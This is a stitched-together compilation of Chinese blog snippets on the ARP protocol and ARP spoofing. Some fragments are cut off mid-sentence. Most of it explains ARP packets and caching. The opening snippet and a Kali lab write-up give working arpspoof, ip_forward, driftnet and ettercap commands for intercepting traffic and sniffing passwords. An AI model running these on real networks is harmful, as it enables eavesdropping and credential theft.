arp欺骗

arp攻击 查看本机ip 使用指令ifconfig inet之后的便是IPV4地址 查一下和自己在同一WiFi下的其他设备 命令： fping -g -r 0 -s 192.168.31.48/24 | grep alive 进行目标IP系统探测（探测是什么系统：电脑or手机） 命令：nmap -T4 -O (目标IP) arp断网攻击 命令：arpspoof -i eth0 -t 192.168.31.140 -r 192.168.31.1 形式：arpspoof -i eth0（一般虚拟机默认为此） -t 目标IP -r 网关 arp欺骗 查本机ip -------------- ifconfig 查和自己处在同一WiFi下的IP ------------ fping -g -r 0 -s 192.168.31.48/24 | grep alive 既然是欺骗，那就不能让目标主机断网，所以要更改配置文件 命令：echo 1 > /proc/sys/net/ipv4/ip_forward cat /proc/sys/net/ipv4/ip_forward arp攻击 命令：arpspoof -i eth0 -t 192.168.31.140 -r 192.168.31.1 抓图片 driftnet -i eth0 实现密码嗅探 ettercap -Tq -i eth0 注意

一、 ARP 协议 　　网络层以上的协议用IP地址来标识网络接口，但以太数据帧传输时，以物理地址来标识网络接口。因此我们需要进行IP地址与物理地址之间的转化。 　　对于IPv4来说，我们使用ARP地址解析协议来完成IP地址与物理地址的转化（IPv6使用邻居发现协议进行IP地址与物理地址的转化，它包含在ICMPv6中）。 　　ARP协议提供了网络层地址（IP地址）到物理地址（mac地址）之间的动态映射。ARP协议 是地址解析的通用协议。 二、ARP缓存 　　ARP高速缓存（即ARP表）是 ARP地址解析协议能够高效运行的关键 (如果有多次ARP响应时，以最后一次响应为准)。 　　ARP给IP地址和MAC地址中间做了动态映射，也就是说缓存了一个ARP表，将得到的IP地址和MAC地址对应起来，如果在表中没有查到IP地址对应的MAC地址，就会发广播去找。随着用户的使用，ARP表如果不做任何措，就会变得越来越臃肿缓慢，就降低了网络传输数据的效率，所以ARP缓存中每一项被设置了生存时间，一般是20分钟，从被创建时开始计算，到时则清除，如果在计时期间又被使用了，计时会重置。电脑断电则ARP表内容清空。 三、ARP 报文的各个字段以及含义 　　帧类型： ARP： 0x0806 （2） ARP 首部： 硬件类型：硬件地址的类型， 1 表示以太网地址。（2） 协议类型：协议地址的类型， 0x0800

每台主机都设有一个 ARP高速缓存（ARP cache） ，里面有本局域网上各主机和路由器的IP地址和硬件地址的映射表，这些都是该主机目前知道的一些地址。 当主机A要向本局域网上的某个主机B发送IP数据报时，先在其ARP高速缓存中查看是否有主机B的IP地 址。如果有，就在ARP高速缓存中查出其对应的硬件地址，再把这个硬件地址写入MAC帧，然后通过局域网把该MAC帧发往此硬件地址。也有可能查不到主机 B的IP地址的项目。这可能是主机B才入网，也可能是主机A刚刚加电，其高速缓存还是空的。在这种情况下，主机A就自动运行ARP，然后按以下步骤找到主 机B的硬件地址。 实现地址解析的第一步是产生ARP请求帧。在ARP帧数据部分的相应字段写入本地主机的物理地址、IP地址、待侦测的目的IP地址，在目的物理地址字段写入0，并在操作类型字段写入1，用以表示本数据帧是一个ARP请求数据帧。 该ARP请求帧以本地网络适配器的物理地址作为源地址，以物理 广播地址（FF-FF-FF-FF-FF-FF） 作为目的地址，通过物理层发送出去。 由于采用了广播地址，因此网段内所有的主机或设备都能够接收到该数据帧。除了目的主机外，所有接收到该ARP请求帧的主机和设备都会丢弃该ARP请求帧，因为目的主机能够识别ARP消息中的IP地址是否与本机相同。 与目的IP地址匹配的主机构造ARP应答帧。在ARP应答帧中

一台pc A（192.168.1.2），想和另一台pc B（192.168.1.3）通信，pc A对自己所在局域网络内的所有主机，也包括路由器的接口喊（发送ARP查询信息）：ip地址是192.168.1.3的pc的mac地址是多少，请告诉我。pc B听到了，告诉pc A我是，并把自己的IP地址和mac地址，一起发送给了pc A。 ARP协议：Address Resolution Protocol。广播请求，单播更新。 ARP的作用：通过广播的方式，找出已知的IP地址的主机的mac地址。 ARP的request和response报文的格式是一样的，用一个标识位去区分是request还response ARP发送方报文的目的mac地址是广播地址：FFFFFFFFFFFF（48个bit）。 ARP接收方，接到发送方的请求报文后，会自动把请求方的ip地址和mac地址加入到自己的mac地址表里，然后用单播的方式，使用ARP报文，给发送方发送自己的mac地址。 ping使用的是icmp协议，这个协议的报文里必须有对方的mac地址，但是当第一次ping一个ip地址时，由于不知道对方的mac地址，所以需要发送一个arp广播，也就是arp协议的报文，到mac为FFFFFFFFFFFF的广播地址。 分析首次ping一个在同一个网络内的ip地址 在ios里第一次ping（R1的f0

ARP欺骗实验 ARP欺骗介绍 摘自百度百科 ARP欺骗（是针对以太网地址解析协议（ARP）的一种攻击技术，通过欺骗局域网内访问者PC的网关MAC地址，使访问者PC错以为攻击者更改后的MAC地址是网关的MAC，导致网络不通。此种攻击可让攻击者获取局域网上的数据包甚至可篡改数据包，且可让网上上特定计算机或所有计算机无法正常连线。最早探讨ARP欺骗的文章是由Yuri Volobuev所写的《ARP与ICMP转向游戏》（ARP and ICMP redirection games）。 其实arp欺骗就是假冒网关截取篡改数据包 实验步骤 1、工具准备 winpcap、Cain 2、环境配置 虚拟机（攻击机），宿主机（被欺骗机），虚拟机网络设置为桥接模式，保证虚拟机能够上网 本次实验借用的是他人的电脑，宿主机为Mac系统 3、查看虚拟机和宿主机IP 虚拟机的ip为192.168.0.102 宿主机的ip为192.168.0.100 并且，在实验开始前，已经用虚拟机ping过百度一类的网址，保证能够上网。 4、运行Cain主程序 打开Cain主程序，并单击“配置菜单”，选择IP为本机的（192.168.0.102）的网卡适配器 5. 扫描活动主机 单击主界面“嗅探器”标签，切换到“主机”一栏，单击“开始嗅探”按钮后，空白处鼠标右键单击，打开菜单，选择“扫描Mac地址”。 扫描结束后

地址解析协议（Address Resolution Protocol，ARP）是在仅知道主机的IP地址时确 地址解析协议定其物理地址的一种协议。因IPv4和以太网的广泛应用，其主要用作将IP地址翻译为以太网的MAC地址，但其也能在ATM( 异步传输模式)和FDDIIP(Fiber Distributed Data Interface 光纤分布式数据接口)网络中使用。从IP地址到物理地址的映射有两种方式：表格方式和非表格方式。ARP具体说来就是将网络层（IP层，也就是相当于OSI的第三层）地址解析为数据连接层（MAC层，也就是相当于OSI的第二层）的MAC地址。 1. 什么是ARP? 　　ARP (Address Resolution Protocol) 是个地址解析协议。最直白的说法是：在IP-以太网中，当一个上层协议要发包时，有了节点的IP地址，ARP就能提供该节点的MAC地址。 　　2. 为什么要有ARP？ 　　OSI 模式把网络工作分为七层，彼此不直接打交道，只通过接口(layer interface). IP地址在第三层, MAC地址在第二层。协议在发送数据包时，得先封装第三层（IP地址），第二层（MAC地址）的报头, 但协议只知道目的节点的IP地址，不知道其MAC地址，又不能跨第二、三层，所以得用ARP的服务。 　　3. 什么是ARP 　　cache? ARP cache

路由交换协议-----ARP ARP协议 ARP（Address Resolution Protocol），是根据IP地址获取MAC地址的一个 TCP/IP 协议，即将IP地址对应到物理地址，从而实现数据链路层的可达性。 ARP 的数据包是这样的： 硬件类型：发送方需要知道的硬件地址类型，一般为以太网（值为1）。 协议类型：发送方提供的三层协议地址类型，一般为IP。 硬件地址长度和协议长度：硬件地址和协议地址的长度。 操作类型：用来表示这个报文的类型。 1 表示ARP请求 2 表示ARP响应 3 表示RARP请求 4 表示RARP响应 RARP（Reverse Address Resolution Protocol）：反向地址转换协议，即将MAC地址对应到IP地址，与ARP相反。 发送方的硬件地址：发送ARP报文设备的MAC地址。 源IP地址：发送方的IP地址。 目标硬件地址：接收方的MAC地址。 目标IP地址：接收方的IP地址。 抓个包看一下： 目的MAC地址为 00:00:00:00:00:00 ,是因为这是一个广播包。 ARP工作原理 一般网络设备都有一个ARP缓存，用来存放IP地址和MAC地址的关联信息。发送数据之前，首先查找ARP缓存，如果缓存中有IP地址对应的物理地址，那么用此MAC地址封装以太帧发送，如果没有则会广播ARP报文

一、ARP攻击概述 在上篇文章里，我给大家普及了ARP协议的基本原理，包括ARP请求应答、数据包结构以及协议分层标准，今天我们继续讨论大家最感兴趣的话题：ARP攻击原理是什么？通过ARP攻击可以做什么，账号是否可以被窃取？有哪些常见的ARP渗透（攻击）工具可以用来练手？ARP扫描和攻击有什么区别，底层数据包特征是怎样的？ 接下来，我们通过图解的方式来深入了解ARP攻击是如何实现的。 二、ARP攻击原理 但凡局域网存在ARP攻击，都说明网络存在"中间人"，我们可以用下图来解释。 在这个局域网里面，PC1、PC2、PC3三台主机共同连接到交换机SW1上面，对应3个接口port1/2/3。假设PC3这台主机安装了ARP攻击软件或遭受ARP病毒，成为这个网络的攻击者（hacker），接下来，PC3是如何攻击的？先不急，先来回顾下PC1和PC2是如何通信的。 ①PC1需要跟PC2通信，通过ARP请求包询问PC2的MAC地址，由于采用广播形式，所以交换机将ARP请求包从接口P1广播到P2和PC3。（注：交换机收到广播/组播/未知帧都会其他接口泛洪） ②PC2根据询问信息，返回ARP单播回应包；此时PC3作为攻击者，没有返回ARP包，但是处于"监听"状态，为后续攻击做准备。 ③PC1和PC2根据ARP问答，将各自的ARP映射信息（IP-MAC）存储在本地ARP缓存表。 ④交换机根据其学习机制

使用arpspoof进行ARP欺骗 使用虚拟机上的kail进行测试 基本原理 我们将运行实际的ARP中毒攻击，重定向数据包流并使其流经我们的设备 基本命令 arpspooef -i 网卡 -t 目标ip 默认网关 测试 下面是我作为被攻击的kail，ip为192.168.25.129 下面是我作为攻击的kail，网卡对应ip，网卡名字为 eth0 ，ip为192.168.25.128 使用上面介绍的命令，网卡为攻击kail上的，为eth0，第二个参数为被攻击的kail的ip，最后一个为网关，该局域网网关为192.168.25.2（可以自己设置） 注意！！！！！！！！！ 这里若没有配置包的转发，那么当数据包到达我们机子的时候会丢弃，即出现 断网现象 。 配置数据包转发： echo 1 >/proc/sys/net/ipv4/ip_forward 总结：当被攻击中上网时，会访问默认网关，此时我们诱骗被攻击者主机，向其说明默认网关的MAC地址为攻击的Kail的MAC地址，于是被攻击者的所有数据包都往攻击者的机子上发，然后攻击者在配置数据包转发，将数据包扔出去，这时候成功诱骗被攻击中。这时，我们可以使用一些嗅探攻击进行数据，图片的盗取。如使用driftnet -i eth0对我们自己的网卡进行监控（由于被攻击者的所有数据都需要经过我们的网卡，所有我们能查看到被攻击者的一些数据）

一.工作原理 地址解析协议，即ARP（Address Resolution Protocol），是根据IP地址获取物理地址的一个TCP/IP协议，是 网络链路层的协议 ，在局域网中使用。主机发送信息时将包含目标IP地址的ARP请求广播到网络上的所有主机，并接收返回消息，以此确定目标的物理地址；收到返回消息后将该IP地址和物理地址存入本机ARP缓存中并保留一定时间，下次请求时直接查询ARP缓存以节约资源。地址解析协议是建立在网络中各个主机互相信任的基础上的，网络上的主机可以自主发送ARP应答消息，其他主机收到应答报文时不会检测该报文的真实性就会将其记入本机ARP缓存；由此攻击者就可以向某一主机发送伪ARP应答报文，使其发送的信息无法到达预期的主机或到达错误的主机，这就构成了一个ARP欺骗。 ARP的工作过程： 主机A的IP地址为192.168.1.1，MAC地址为0A-11-22-33-44-01 主机B的IP地址为192.168.1.2，MAC地址为0A-11-22-33-44-02 当主机A要与主机B通信时，地址解析协议可以将主机B的IP地址（192.168.1.2）解析成主机B的MAC地址，以下为工作流程： 第1步：根据主机A上的路由表内容，IP确定用于访问主机B的转发IP地址是192.168.1.2。然后A主机在自己的本地ARP缓存中检查主机B的匹配MAC地址。 第2步